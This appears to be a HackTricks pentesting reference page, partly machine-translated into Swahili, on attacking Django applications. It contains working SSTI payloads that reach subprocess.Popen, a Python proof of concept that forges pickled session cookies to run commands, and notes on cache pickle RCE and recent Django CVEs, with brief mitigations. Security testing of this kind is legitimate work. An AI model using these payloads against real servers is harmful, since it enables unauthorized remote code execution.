# Django {{#include ../../banners/hacktricks-training.md}} ## Cache Manipulation to RCE Django's default cache storage method is [Python pickles](https://docs.python.org/3/library/pickle.html), which can lead to RCE if [untrusted input is unpickled](https://media.blackhat.com/bh-us-11/Slaviero/BH_US_11_Slaviero_Sour_Pickles_Slides.pdf). **Ikiwa mshambuliaji anaweza kupata ufikiaji wa kuandika kwenye cache, wanaweza kupanua udhaifu huu hadi RCE kwenye server ya msingi**. Django cache is stored in one of four places: [Redis](https://github.com/django/django/blob/48a1929ca050f1333927860ff561f6371706968a/django/core/cache/backends/redis.py#L12), [memory](https://github.com/django/django/blob/48a1929ca050f1333927860ff561f6371706968a/django/core/cache/backends/locmem.py#L16), [files](https://github.com/django/django/blob/48a1929ca050f1333927860ff561f6371706968a/django/core/cache/backends/filebased.py#L16), or a [database](https://github.com/django/django/blob/48a1929ca050f1333927860ff561f6371706968a/django/core/cache/backends/db.py#L95). Cache iliyohifadhiwa kwenye server ya Redis au database ndizo vigezo vya shambulio vinavyowezekana zaidi (Redis injection na SQL injection), lakini mshambuliaji anaweza pia kutumia cache ya aina ya file-based kugeuza uandishi wowote kuwa RCE. Watunzaji wametaja hili kuwa suala lisilo la wasiwasi. Ni muhimu kutambua kwamba folda ya cache file, jina la jedwali la SQL, na maelezo ya server ya Redis yatatofautiana kulingana na utekelezaji. This HackerOne report provides a great, reproducible example of exploiting Django cache stored in a SQLite database: https://hackerone.com/reports/1415436 --- ## Server-Side Template Injection (SSTI) The Django Template Language (DTL) is **Turing-complete**. If user-supplied data is rendered as a *template string* (for example by calling `Template(user_input).render()` or when `|safe`/`format_html()` removes auto-escaping), an attacker may achieve full SSTI → RCE. ### Detection 1. Look for dynamic calls to `Template()` / `Engine.from_string()` / `render_to_string()` that include *any* unsanitised request data. 2. Send a time-based or arithmetic payload: ```django {{7*7}} ``` If the rendered output contains `49` the input is compiled by the template engine. ### Primitive to RCE Django blocks direct access to `__import__`, but the Python object graph is reachable: ```django {{''.__class__.mro()[1].__subclasses__()}} ``` Pata index ya `subprocess.Popen` (≈400–500, kutegemea build ya Python) na execute arbitrary commands: ```django {{''.__class__.mro()[1].__subclasses__()[438]('id',shell=True,stdout=-1).communicate()[0]}} ``` Gadget universal salama ni kurudia hadi `cls.__name__ == 'Popen'`. The same gadget works for **Debug Toolbar** or **Django-CMS** template rendering features that mishandle user input. --- ### Angalia pia: ReportLab/xhtml2pdf PDF export RCE Applications built on Django commonly integrate xhtml2pdf/ReportLab to export views as PDF. When user-controlled HTML flows into PDF generation, rl_safe_eval may evaluate expressions inside triple brackets `[[[ ... ]]]` enabling code execution (CVE-2023-33733). Details, payloads, and mitigations: {{#ref}} ../../generic-methodologies-and-resources/python/bypass-python-sandboxes/reportlab-xhtml2pdf-triple-brackets-expression-evaluation-rce-cve-2023-33733.md {{#endref}} --- ## RCE ya Session Cookie iliyotegemea Pickle If the setting `SESSION_SERIALIZER = 'django.contrib.sessions.serializers.PickleSerializer'` is enabled (or a custom serializer that deserialises pickle), Django *decrypts and unpickles* the session cookie **before** calling any view code. Therefore, possessing a valid signing key (the project `SECRET_KEY` by default) is enough for immediate remote code execution. ### Mahitaji ya Exploit * Server inatumia `PickleSerializer`. * Mshambuliaji anajua / anaweza kukisia `settings.SECRET_KEY` (leaks via GitHub, `.env`, error pages, etc.). ### Proof-of-Concept ```python #!/usr/bin/env python3 from django.contrib.sessions.serializers import PickleSerializer from django.core import signing import os, base64 class RCE(object): def __reduce__(self): return (os.system, ("id > /tmp/pwned",)) mal = signing.dumps(RCE(), key=b'SECRET_KEY_HERE', serializer=PickleSerializer) print(f"sessionid={mal}") ``` Tuma cookie iliyopatikana, na payload itaendeshwa kwa ruhusa za WSGI worker. **Mitigations**: Tumia `JSONSerializer` ya default, badilisha `SECRET_KEY` mara kwa mara, na sanidi `SESSION_COOKIE_HTTPONLY`. --- ## CVE za Django za Matokeo Makubwa (2023-2025) Pentesters Wanazopaswa Kukagua * **CVE-2025-48432** – *Log Injection via unescaped `request.path`* (fixed June 4 2025). Inaruhusu mashambulizi kusafirisha newlines/ANSI codes ndani ya faili za log na kuchafua uchambuzi wa log unaofuata. Patch level ≥ 4.2.22 / 5.1.10 / 5.2.2. * **CVE-2024-42005** – *Critical SQL injection* in `QuerySet.values()/values_list()` on `JSONField` (CVSS 9.8). Unda funguo za JSON ili kuvunja quoting na kutekeleza SQL yoyote. Fixed in 4.2.15 / 5.0.8. Daima tambua (fingerprint) toleo halisi la framework kupitia ukurasa wa kosa wa `X-Frame-Options` au hash ya `/static/admin/css/base.css` na jaribu vipengele vilivyotajwa hapo juu pale inapofaa. --- ## Marejeo * Taarifa ya usalama ya Django – "Django 5.2.2, 5.1.10, 4.2.22 address CVE-2025-48432" – 4 Jun 2025. * OP-Innovate: "Django releases security updates to address SQL injection flaw CVE-2024-42005" – 11 Aug 2024. * 0xdf: University (HTB) – Exploiting xhtml2pdf/ReportLab CVE-2023-33733 to gain RCE and pivot into AD – [https://0xdf.gitlab.io/2025/08/09/htb-university.html](https://0xdf.gitlab.io/2025/08/09/htb-university.html) {{#include ../../banners/hacktricks-training.md}}